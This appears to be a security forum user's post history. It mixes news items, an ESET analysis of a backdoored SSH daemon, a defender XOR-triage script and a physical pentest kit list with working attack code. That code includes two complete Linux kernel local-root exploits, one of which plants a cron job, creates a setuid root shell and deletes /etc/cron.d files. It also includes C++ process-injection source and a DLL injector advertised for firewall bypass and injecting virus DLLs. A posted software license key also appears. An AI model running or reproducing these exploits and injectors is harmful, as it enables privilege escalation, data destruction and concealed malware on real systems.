Nytro

Everything posted by Nytro

  1. Pentagon to boost cybersecurity force

RICK WILKING/Reuters - A network defender works at the Air Force Space Command Network Operations & Security Center in Colorado Springs, Colorado. The Pentagon is expanding efforts to safeguard critical computer systems and conduct cyberattacks against foreign adversaries, officials say.

By Ellen Nakashima, Monday, January 28, 12:42 AM

The Pentagon has approved a major expansion of its cybersecurity force over the next several years, increasing its size more than fivefold to bolster the nation’s ability to defend critical computer systems and conduct offensive computer operations against foreign adversaries, according to U.S. officials.

The move, requested by the head of the Defense Department’s Cyber Command, is part of an effort to turn an organization that has focused largely on defensive measures into the equivalent of an Internet-era fighting force. The command, made up of about 900 personnel, will expand to include 4,900 troops and civilians.

Details of the plan have not been finalized, but the decision to expand the Cyber Command was made by senior Pentagon officials late last year in recognition of a growing threat in cyberspace, said officials, who spoke on the condition of anonymity because the expansion has not been formally announced. The gravity of that threat, they said, has been highlighted by a string of sabotage attacks, including one in which a virus was used to wipe data from more than 30,000 computers at a Saudi Arabian state oil company last summer.

The plan calls for the creation of three types of forces under the Cyber Command: “national mission forces” to protect computer systems that undergird electrical grids, power plants and other infrastructure deemed critical to national and economic security; “combat mission forces” to help commanders abroad plan and execute attacks or other offensive operations; and “cyber protection forces” to fortify the Defense Department’s networks.

Targeting ‘malicious actors’

Although the command was established three years ago for some of these purposes, it has largely been consumed by the need to develop policy and legal frameworks and ensure that the military networks are defended. Current and former defense officials said the plan will allow the command to better fulfill its mission.

“Given the malicious actors that are out there and the development of the technology, in my mind, there’s little doubt that some adversary is going to attempt a significant cyberattack on the United States at some point,” said William J. Lynn III, a former deputy defense secretary who helped fashion the Pentagon’s cybersecurity strategy. “The only question is whether we’re going to take the necessary steps like this one to deflect the impact of the attack in advance or ... read about the steps we should have taken in some post-attack commission report.”

Although generally agreed to by the military’s service chiefs, the plan has raised concerns about how the Army, Navy, Marines and Air Force will find so many qualified cybersecurity personnel and train them. It also raises deeper issues — which are likely to intensify as the Cyber Command grows over the years — about how closely the command should be aligned with the National Security Agency, the giant electronic-spying agency that provides much of its intelligence support. The head of the Cyber Command, Gen. Keith B. Alexander, is also the director of the NSA, which employs some of the nation’s most advanced cyber-operations specialists.

The new force structure was alluded to last fall in a major speech by Defense Secretary Leon E. Panetta, who said, “Our mission is to defend the nation,” and noted that the department was “putting in place the policies and organizations we need to execute the mission.”

In an interview, a senior defense official said that the “national mission” teams would focus their efforts overseas and that any actions they took would be directed outside U.S. networks — unless the teams were asked to provide assistance to another agency with domestic authority, such as the FBI. “There’s no intent to have the military crawl inside industry or private networks and provide that type of security,” the official said. He stressed that the military would act only in cases in which there was a threat of an attack that could “really hurt,” adding: “We’re not talking about doing something to make sure that Mrs. Smith’s bank account didn’t get hijacked by somebody.”

The plan to expand the Cyber Command comes at a time when the military’s services are being ordered to cut spending, a reflection of how important senior military officials consider the need to improve the nation’s cybersecurity footing. Some military officials have grudgingly accepted the need to contribute personnel to an expanded cybersecurity force. There are also differences over how much control the combatant commands will have over cyber teams. The “combat mission” teams may help commanders in operations such as a cyber component to disable an enemy’s command-and-control system before a conventional attack. Each region will have teams that focus on particular threats — say, from China or Iran.

“You get the resource guys sucking a lot of air through their teeth because they know their service chiefs have backed it,” one Navy official said. “So they have to find the resources to pay for the people.”

Alignment with NSA

Some military and defense officials question whether the Cyber Command can reach its full potential as a military command as long as it is so dependent on the NSA and is led by the NSA’s director.

The close relationship between the two has had its advantages, officials say: The agency can peer into foreign networks and provide the command with intelligence, including in cases in which an adversary is suspected of planning a computer attack or developing a potent virus. “That gives you an advantage of being able to plan for and be prepared to react,” the defense official said.

But the NSA is so intertwined with the Cyber Command — the two operations centers are located side by side, and, until recently, some Cyber Command personnel had nsa.gov e-mail addresses — that some current and former officials wonder whether the military command can create an independent, strategic doctrine. The concern is that the intelligence agency’s priorities will dominate, with an emphasis on the development of tools that are useful for surveillance but not necessarily for disrupting adversaries.

There’s a “cogent argument” to be made that for the Cyber Command to become a true military command, “you sever that” relationship, one military official said.

But, in fact, said one former intelligence official, the NSA uses military personnel to do much of its work and pays for a good portion of the services’ cyber operators. “That’s been the plan all along,” the former official said. “Take the talent resident in NSA, turn it into [cyber] attack talent.”

With the decision to expand the Cyber Command, Alexander, who has been asked to stay on until summer 2014, is seeing some of his vision fulfilled. He has sought independent budget authority for the Cyber Command to hire and control forces, similar to the way Special Operations Command can. He has not won that authority, though officials agreed to give him the additional forces.

He also has the support of senior Pentagon officials to elevate the Cyber Command to full command status, out from under the aegis of Strategic Command. But that move, which requires consulting with Congress, is not happening just yet, officials say.

Source: Pentagon to boost cybersecurity force - The Washington Post
  2. Microsoft Office Command Execution 0day Being sold for $20,000

Posted by: FastFlux on January 25, 2013

The 1337day team has just posted an exploit, which is going for 20,000 USD. This 0day is contained in Microsoft Office and affects versions 2003, 2007 and 2010. It was placed under the “Remote Exploits” category and the description was: “Microsoft Office 2003/2007/2010 all service pack from a command execution vulnerability.” The team also included a YouTube video demonstrating the exploit and proving that it’s real. These types of 0days can be detrimental to all Windows users; both home users and businesses utilize Microsoft Office on a daily basis, making this a critical exploit. You can view and purchase the exploit here.

Source: Microsoft Office Command Execution 0day Being sold for $20,000
  3. CentOS Linux bible

This is a guide to the CentOS Linux operating system. Linux guru Tim Boronczyk thoroughly covers the topic, whether you're a Linux novice or a regular who now wants to master this increasingly popular distribution. First find out how to install and configure CentOS. From there, you'll cover a wealth of Linux and CentOS tools, functions, and techniques, including: how to work in the GNOME and KDE desktop environments; how to use the Linux shell, file system, and text editor; how to configure CUPS printers, Samba for file and printer sharing and other features using GUI tools; and more.

Size: 18Mb
Publication year: 2009
Book language: English

Download

Via: CentOS Linux bible | Linux Ubuntu - Linux Books - Linux Distribution
  4. Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys

Andy Greenberg, Forbes Staff

Two 3D-printed and one laser-cut copy of restricted handcuff keys.

The security of high-end handcuffs depends on a detainee not having access to certain small, precisely-shaped objects. In the age of easy 3D printing and other DIY innovations, that assumption may no longer apply.

In a workshop Friday at the Hackers On Planet Earth conference in New York, a German hacker and security consultant who goes by the name “Ray” demonstrated a looming problem for handcuff makers hoping to restrict the distribution of the keys that open their cuffs: With plastic copies he cheaply produced with a laser-cutter and a 3D printer, he was able to open handcuffs built by the German firm Bonowi and the English manufacturer Chubb, both of which attempt to control the distribution of their keys to keep them exclusively in the hands of authorized buyers such as law enforcement.

The demonstration highlights a unique problem for handcuff makers, who design their cuffs to be opened by standard keys possessed by every police officer in a department, so that a suspect can be locked up by one officer and released by another, says Ray. Unlike other locks with unique keys, any copy of a standard key will open a certain manufacturer’s cuff. “Police need to know that every new handcuff they buy has a key that can be reproduced,” he says. “Until every handcuff has a different key, they can be copied.”

Ray presenting his work at the HOPE conference.

Unlike keys for more common handcuffs, which can be purchased (even in forms specifically designed to be concealable) from practically any survivalist or police surplus store, Bonowi’s and Chubb’s keys can’t be acquired from commercial vendors. Ray says he bought a Chubb key from eBay, where he says they intermittently appear, and obtained the rarer Bonowi key through a source he declined to name. Then he precisely measured them with calipers and created CAD models, which he used to reproduce the keys en masse, both in plexiglass with a friend’s standard laser cutter and in ABS plastic with a Repman 3D printer. Both types of tools can be found in hacker spaces around the U.S. and, in the case of 3D printers, thousands of consumers’ homes.

A Bonowi key (top) and a Chubb key (bottom) with a laser-cut plexiglass key that opens either between them.

Over the weekend, a lockpick vendor at the HOPE conference was already selling dozens of the plexiglass Chubb keys for a mere $4 each. Ray says he plans to upload the CAD files for the Chubb key to the 3D-printing Web platform Thingiverse after the annual lockpicking conference LockCon later this week. I reached out to both Chubb and Bonowi’s parent company Assa Abloy over the weekend, and will update this story when I hear back from them.

Ray also tried creating duplicate plexiglass keys for high-security handcuffs from the German manufacturer Clejuso, but found that when the cuffs were fully secured the plexiglass wasn’t strong enough to overcome their internal springs. An attendee at the workshop helpfully suggested he try laser-cutting the stronger material Lexan instead.

Dozens of Chubb keys being reproduced in a laser-cutter.

Ray, who typically works as a computer security consultant but has also advised the German police on handcuff technology, says his goal isn’t to reduce handcuffs’ security so much as to expose their vulnerabilities. His tools, he argues, are already available to criminals along with the rest of the public. “If someone is planning a prison or court escape, he can do it without our help,” says Ray. “We’re just making everyone aware, both the hackers and the police.”

Source: Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys - Forbes
  5. Local race - Linux 2.6 ALL - h00lyshit

/*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit <very big file on the disk>
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>

static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;

/* h00lyshit shell code */
__asm__ ("  __excode:   call 1f               \n"
         "  1:          mov $23, %eax         \n"
         "              xor %ebx, %ebx        \n"
         "              int $0x80             \n"
         "              pop %eax              \n"
         "              mov $cmd-1b, %ebx     \n"
         "              add %eax, %ebx        \n"
         "              mov $arg-1b, %ecx     \n"
         "              add %eax, %ecx        \n"
         "              mov %ebx, (%ecx)      \n"
         "              mov %ecx, %edx        \n"
         "              add $4, %edx          \n"
         "              mov $11, %eax         \n"
         "              int $0x80             \n"
         "              mov $1, %eax          \n"
         "              int $0x80             \n"
         "  arg:        .quad 0x00, 0x00      \n"
         "  cmd:        .string \"/bin/sh\"   \n"
         "  __excode_e: nop                   \n"
         "  .global __excode                  \n"
         "  .global __excode_e                \n");

extern void (*__excode) (void);
extern void (*__excode_e) (void);

void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}

/* exploit this shit */
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);

  chmod ("/proc/self/environ", 04755);

  c = mmap (0, 4096, PROT_READ | PROT_WRITE,
            MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /* slow down machine */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");

  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);

  i = fork ();

  /* give it a try */
  if (i)
    {
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();
    }
  else
    {
      nice (10);
      while (!(*c));
      sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}

int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);

  printf ("\npreparing");
  fflush (stdout);

  /* make setuid a.out */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));
  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /* make environment */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
        {
          e[j++] = &p[k];
          k = i + 1;
        }
    }

  /* reexec */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");

  return 0;
}

Source: Local root exploits
  6. Local root 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp

#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com

cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
	int child;
	struct rlimit corelimit;
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	setrlimit(RLIMIT_CORE, &corelimit);

	if ( !( child = fork() )) {
		chdir("/etc/cron.d");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(200);
		exit(1);
	}

	kill(child, SIGSEGV);

	sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void) {
	setgid(0);
	setuid(0);
	system("/bin/sh");
	system("rm -rf /tmp/s");
	system("rm -rf /etc/cron.d/*");
	return 0;
}
__EOF__

echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

Source: Local root exploits
  7. Physical Penetration Testing Toolkit

Most penetration testing companies also provide physical penetration testing as part of their services. Some of them are taking this service more seriously than others, as they are spending part of their budget to obtain specialized costumes and equipment that can be used in physical penetration tests. In this article we will examine some of the equipment that is necessary to have if we are going to conduct a physical penetration test.

Get Out Of Jail Free Card

This is usually a signed letter from the client which states that the penetration tester is authorized to perform the test and the client is aware. This type of letter will work as proof in case things go bad and you get caught by the security personnel or the police authorities. So the letter must include the contact details of the people who are aware that a test is being performed (preferably people in higher-level positions), and they must be reachable during the test. This letter should never be forgotten by the penetration tester, and it is good practice to have at least 2 original copies in case one is lost accidentally or destroyed.

Get Out Of Jail Template

Cameras

Cameras are important equipment because you can take photos of client documents, facilities and the areas that you have managed to gain access to. These photos can be used as evidence in the penetration testing report afterwards. Of course the cameras of mobile phones can be used as well, but a proper digital camera with a large amount of memory is recommended.

Camera

Binoculars

Binoculars are useful in cases where you want to observe the security guards from a long distance or you want to perform shoulder surfing attacks against the employees of your client. For portability reasons and for not raising any alerts it is advised to buy binoculars that can fit into your pocket.

Portable Binoculars

Laptops

In a physical penetration test someone will assume that a laptop is not needed because all you have to do is physically penetrate. Wrong! In case you want to construct a scenario where you will disguise yourself as an employee of the company, a laptop is a critical component. Additionally you can have a case where the client will require you to manage to attach to the internal network.

Laptop

GPS

A GPS device can help you in many ways. First of all you can get an idea of the location that you are going to attack by observing satellite photos before the test. Alternatively you can use Google Maps for that, but the GPS has the advantage that you can carry it with you during the test and mark locations that you want to explore or to avoid. Also it is vital for your support team to know exactly where you are. Before you buy a GPS make sure that the device can export the route that you took in order to include it in the report.

GPS Device

Lock Picking Tools

Of course in a physical penetration test you don’t expect every door to be open, so it is essential to have a set of lock picking tools in your bag as well. Generally lock picking tools are not very expensive, so you will need to choose very carefully the best quality that will suit your needs, as you don’t want to break your client’s locks.

Lock Picking Tools

Snap Lock Pick Gun

USB Sticks

There are scenarios where in a physical penetration test you might be required just to plant a USB stick containing malicious content inside the premises of the company. This will be the case when the client wants to test their employees’ awareness against this type of attack. You can use the Social Engineering Toolkit in order to create the malicious USB, or you can import your own files.

USB Sticks

Pwnie Express Tools

Pwnie Express is a company that specializes in constructing hardware tools that can be used in physical penetration testing engagements. Most of them are quite expensive, but the effectiveness of the tools is high because they look like normal devices, so when you plug them into the network it will be difficult for them to be discovered by the employees or the administrators. Some of the devices that you can buy are the following: Pwn Plug Mini, Power Pwn and PwnPhone.

Pwn Plug Mini

Power Pwn

Source: Physical Penetration Testing Toolkit
  8. Aircrack-Ng Megaprimer Part 1: Airmon-Ng

Description: Part 1 in a series covering the tools in the aircrack-ng suite. Part 1 discusses airmon-ng.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Aircrack-Ng Megaprimer Part 1: Airmon-Ng
  9. Linux/SSHDoor.A Backdoored SSH daemon that steals passwords

by Sébastien Duquette, Malware Researcher

In his summary of New Year predictions by security researchers here at ESET, Stephen Cobb pointed to expanded efforts by malware authors to target the Linux operating system. Looks like that might be right: A blog post published by Sucuri yesterday describes a backdoored version of the SSH daemon discovered on compromised servers. Interestingly, this backdoor was used in conjunction with the malicious Apache module Linux/Chapro.A that we blogged about recently.

The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either a hardcoded password or SSH key.

The strings related to the hidden behaviors are XOR encoded. This is done to avoid easy identification by searching the binary for suspicious strings. We identified a total of 16 encoded strings. The figure below shows the part of the code responsible for decoding the hidden data by XORing it with the constant 0x23.

The HTTP protocol is used to send stolen data to a remote server. The information is first encrypted using a 1024-bit RSA key stored in the binary and then Base64 encoded. The data is sent via an HTTP POST request to the server used for data exfiltration. The binary we analyzed contains two hostnames for servers used to collect data: openssh.info and linuxrepository.org. Both names were probably chosen to avoid raising suspicions from the administrators of the compromised servers. At this point in time, both hostnames point to a server hosted in Iceland with IP 82.221.99.69.

When the daemon is started, the backdoor sends the IP and port on which the service is running and the hostname of the server. Whenever a user successfully logs onto the compromised server, the username and password are also sent to the remote server.

In addition to stealing credentials, the backdoor guarantees persistence on the compromised host for the attacker in two different ways. First, it has a hard-coded password inserted in the code. If any user logs in using this password, he is automatically granted access to the compromised server. The following figure shows the string comparison between the password provided by a user trying to log in and the hardcoded password. Second, the modified binary also carries an SSH key. If a user logs into the server with the private key corresponding to the hard-coded public key, he is automatically granted access.

The backdoor can also retrieve configuration data from the file /var/run/.options. If this file exists the backdoor will use the hostname, backdoor password and SSH key stored in it. The variables are stored one per line in cleartext.

As with Linux/Chapro.A, it is hard to tell how this Trojanized SSH daemon made its way onto a compromised server, but outdated applications or weak passwords are probably to blame.

Finding backdoored files can be problematic for most system administrators. We recommend regular use of integrity checking tools plus monitoring of outgoing network connections and regular scanning of all files by an antivirus product. This threat is detected by ESET as Linux/SSHDoor.A.

Special thanks to Peter Kosinar, Pierre-Marc Bureau, and Olivier Bilodeau for their help.

Analyzed sample MD5 hash: 90dc9de5f93b8cc2d70a1be37acea23a

Source: Linux/SSHDoor.A Backdoored SSH daemon that steals passwords | ESET ThreatBlog
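A defender-side check that follows from the XOR-0x23 detail in the post above, added here as an example (it is not ESET's tooling and contains nothing taken from the malware sample): it XOR-encodes the indicators the post names (the two exfiltration hostnames and the /var/run/.options config path) with the same single-byte key and searches a binary for them in their obfuscated form, and it also dumps the printable runs of a fully decoded blob for manual triage. The key and indicators come from the post; the stand-in "binary" is constructed for the demo.

```python
"""Triage helper for Linux/SSHDoor.A-style XOR-obfuscated strings.

Added example for this page, not ESET's tooling. The key (0x23) and the
indicator strings are the ones named in the write-up; build_sample_binary()
is a constructed stand-in, not the analyzed sample.
"""
import re

XOR_KEY = 0x23
# Indicators from the write-up: exfiltration hostnames and the config path.
INDICATORS = (b"openssh.info", b"linuxrepository.org", b"/var/run/.options")


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every byte with a single-byte key; encoding and decoding are the same op."""
    return bytes(b ^ key for b in data)


def find_xor_indicators(blob: bytes, indicators=INDICATORS, key: int = XOR_KEY):
    """Locate known indicators in their obfuscated form.

    Instead of decoding the whole file, each indicator is encoded with the key
    and searched for as a byte pattern. That is exact (no hits from plaintext
    that merely looks printable after decoding) and works on files of any
    size. Returns sorted (offset, indicator) pairs.
    """
    hits = []
    for ind in indicators:
        pattern = xor_bytes(ind, key)
        start = 0
        while (off := blob.find(pattern, start)) != -1:
            hits.append((off, ind.decode()))
            start = off + 1
    return sorted(hits)


def extract_xor_strings(blob: bytes, key: int = XOR_KEY, min_len: int = 6):
    """Decode the whole blob with the key and return printable runs.

    Useful for finding encoded strings that are not on the indicator list
    (the post reports 16 encoded strings). Expect noise: under XOR 0x23 every
    lowercase ASCII letter maps to an uppercase one, so ordinary plaintext
    words come out as uppercase junk and must be judged by eye. Runs of the
    key byte (what NUL padding decodes to) are stripped from the ends.
    """
    decoded = xor_bytes(blob, key)
    out = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, decoded):
        s = m.group().decode().strip(chr(key))
        if len(s) >= min_len:
            out.append(s)
    return out


def build_sample_binary() -> bytes:
    """Constructed stand-in for a trojanized sshd: a plaintext version banner,
    NUL padding and a plaintext word, plus two indicators stored XOR-0x23
    encoded the way the post describes."""
    return (
        b"OpenSSH_5.3p1\x00" + b"\x00" * 16
        + xor_bytes(b"openssh.info\x00") + b"\x90" * 4
        + xor_bytes(b"/var/run/.options\x00") + b"\x00" * 16
        + b"root\x00"
    )


if __name__ == "__main__":
    sample = build_sample_binary()
    for off, ind in find_xor_indicators(sample):
        print(f"indicator {ind!r} at offset {off:#x}")
    print("decoded printable runs:", extract_xor_strings(sample))
```

On the constructed sample the indicator search reports openssh.info at offset 30 and /var/run/.options at offset 47 and nothing else, while the decoded-string dump also returns "lSFMppk|", which is just the plaintext OpenSSH_ banner mangled by the key; that is why the pattern search, not the dump, should drive an alert. The check only covers this family's single-byte key, so pair it with package-manager verification of the sshd binary (rpm -V openssh-server, or debsums on Debian-derived systems) and the outbound-connection monitoring the post recommends.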
  10. DLL injector that inject DLL into Internet Explorer

Started By zwclose7, Dec 17 2012 01:14 PM

zwclose7: IE Injector (ieinj) allows you to inject any DLLs into Internet Explorer (iexplore.exe). The process only serves as a host for the DLL and the original code of Internet Explorer is not executed.

Usage: ieinj [DLL path]

The steps of DLL injection:
1) Read the DLL path from the command line.
2) Search for the Internet Explorer executable file (iexplore.exe) in the Program Files folder.
3) Start Internet Explorer.
4) Write the DLL path into the target process's memory.
5) Create a remote thread to load the DLL.
6) The injected DLL will execute its code from the DllMain function.
7) Terminate the primary thread of Internet Explorer so the original code of IE is not executed.
8) The injected DLL can create a new thread to execute its code. The code will execute within Internet Explorer.

http://www.youtube.com/watch?v=dm0gGmjmKOc&feature=player_embedded

Note: Your DLL must have the DllMain function to execute code or the process will exit after the injection.

This tool is useful for bypassing firewalls since Internet Explorer is allowed to access the network by most firewalls. This tool is also useful for injecting virus DLLs into Internet Explorer.

The file dll.dll is an example DLL to test the injector. The DLL will display a message box when it is loaded into a process.

Download here http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3745

Source: DLL injector that inject DLL into Internet Explorer - rohitab.com - Forums
  11. My codecave injector

Started By zwclose7, Yesterday, 04:57 AM

zwclose7: This is my first codecave injector. It injects a codecave into another process. The injected codecave will play a beep sound, and then display a message box.

#include <iostream>
#include <Windows.h>

using namespace std;

typedef BOOL (WINAPI *fnBeep)(DWORD,DWORD);
typedef int (WINAPI *fnMessageBoxA)(HWND,LPCSTR,LPCSTR,UINT);

struct PARAMETERS{
    DWORD BEEP;
    DWORD MSGBOX;
    DWORD freq;
    DWORD time;
    HWND hWnd;
    char text[60];
    char title[60];
    UINT type;
};

static DWORD ThreadProc(PARAMETERS * data){
    fnBeep beep=(fnBeep)data->BEEP;
    fnMessageBoxA msgbox=(fnMessageBoxA)data->MSGBOX;
    beep(data->freq,data->time);
    msgbox(data->hWnd,data->text,data->title,data->type);
    return 0;
}

static DWORD Useless(){
    return 0;
}

int main(){
    DWORD PID;
    DWORD TID;
    DWORD exts;
    HANDLE hToken;
    LUID luid;
    LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid);
    TOKEN_PRIVILEGES tp;
    tp.Privileges[0].Luid=luid;
    tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    tp.PrivilegeCount=1;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
    AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
    PARAMETERS data;
    data.freq=1000;
    data.time=1000;
    data.hWnd=0;
    strcpy(data.text,"Hello world");
    strcpy(data.title,"Codecave");
    data.type=MB_ICONINFORMATION;
    HMODULE k32=LoadLibrary("kernel32.dll");
    HMODULE u32=LoadLibrary("user32.dll");
    data.BEEP=(DWORD)GetProcAddress(k32,"Beep");
    data.MSGBOX=(DWORD)GetProcAddress(u32,"MessageBoxA");
    DWORD SizeofProc=(LPBYTE)Useless-(LPBYTE)ThreadProc;
    cout <<"Enter PID: ";
    cin >>PID;
    HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID);
    if(hProcess==NULL){
        cout <<"\nUnable to open process handle.\n\n";
        return 1;
    }
    cout <<"\nProcess handle opened.\n\n";
    cout <<"Allocating memory for thread data.\n\n";
    HANDLE pData=VirtualAllocEx(hProcess,NULL,256,MEM_COMMIT,PAGE_READWRITE);
    if(pData==NULL){
        cout <<"Unable to allocate memory for thread data.\n\n";
        CloseHandle(hProcess);
        return 1;
    }
    cout <<"Allocating memory for thread code.\n\n";
    HANDLE code=VirtualAllocEx(hProcess,NULL,256,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    if(code==NULL){
        cout <<"Unable to allocate memory for thread code.\n\n";
        CloseHandle(hProcess);
        return 1;
    }
    cout <<"Writing thread data to target process.\n\n";
    if(!WriteProcessMemory(hProcess,pData,&data,sizeof(data),NULL)){
        cout <<"Unable to write thread data to target process.\n\n";
        CloseHandle(hProcess);
        return 1;
    }
    cout <<"Writing thread code to target process.\n\n";
    if(!WriteProcessMemory(hProcess,code,(void*)ThreadProc,SizeofProc,NULL)){
        cout <<"Unable to write thread code to target process.\n\n";
        CloseHandle(hProcess);
        return 1;
    }
    cout <<"Data address: "<<pData<<"\n\n";
    cout <<"Code address: "<<code<<"\n\n";
    cout <<"Creating remote thread within target process.\n\n";
    HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)code,pData,0,&TID);
    if(hThread==NULL){
        cout <<"Unable to create remote thread within target process.\n\n";
        CloseHandle(hProcess);
        return 1;
    }
    cout <<"Thread created. Thread ID: "<<TID<<"\n\n";
    cout <<"Waiting for the thread to terminate.\n\n";
    WaitForSingleObject(hThread,INFINITE);
    GetExitCodeThread(hThread,&exts);
    cout <<"Thread terminated with status code "<<exts<<".\n\n";
    cout <<"Closing thread handle.\n\n";
    CloseHandle(hThread);
    cout <<"Closing process handle.\n\n";
    CloseHandle(hProcess);
    return 0;
}

Source: My codecave injector - rohitab.com - Forums
  12. I don't think a prize is necessary for someone to show what they are capable of...
13. Yes, interesting...
14. Beggars, learn to offer something before asking. So that even you, the least intellectually capable, understand: the rule was put in place for two reasons: 1. To keep out leechers, that is beggars, that is people like the specimen above who contribute nothing and help nobody but come begging. 2. From those posts you can tell a few things about a person, whether they think maturely or are a stupid, uneducated kid like the creature above.
15. [h=1]Skype calls intercepted? Microsoft caught up in a major scandal[/h] by Redactia Hit | 25 January 2013 Several internet activists, journalists, major foundations and IT security specialists warn that calls made through Skype may have been intercepted. In an open letter, several users call on Microsoft to investigate the security problem. The open letter, published yesterday by a group that also includes several lawyers defending users' right to data confidentiality, asks Microsoft to publish documentation on the security and privacy practices underlying the Skype VoIP service. Microsoft acquired Skype in October 2011 in a transaction worth 8.5 billion dollars. In the letter, the signatories express concern about the level of access that government institutions might have to the content of Skype communications. The signatories of the open letter include the Electronic Frontier Foundation, Reporters Without Borders, the Egyptian Initiative for Personal Rights and the Tibet Action Institute. The signatories are also concerned that Microsoft will completely replace Windows Live Messenger with Skype in March; if the interception of communications through the VoIP service is confirmed, the number of users who could be "listened to" and monitored at any time grows considerably. Source: The Verge, Cnet Via: Convorbirile de pe Skype, interceptate? Microsoft a intrat intr-un mare scandal | Hit.ro
16. Bitdefender 2013 Congratulations! You have received a key for Bitdefender Internet Security 2013 ——————— L6SAS0E ——————— To use this key you just need to click here. If the product is not activated within 30 days, the key will be invalidated.
17. Also related to the subject: https://rstforums.com/forum/64134-3-men-suspected-developing-distributing-gozi-malware-charged.rst
